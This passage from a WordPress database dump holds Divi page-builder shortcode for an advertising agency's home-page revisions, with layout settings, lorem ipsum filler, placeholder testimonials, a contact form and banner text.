_builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:19:26','2020-08-07 20:19:26','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(612,1,'2020-08-07 20:23:47','2020-08-07 20:23:47','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" 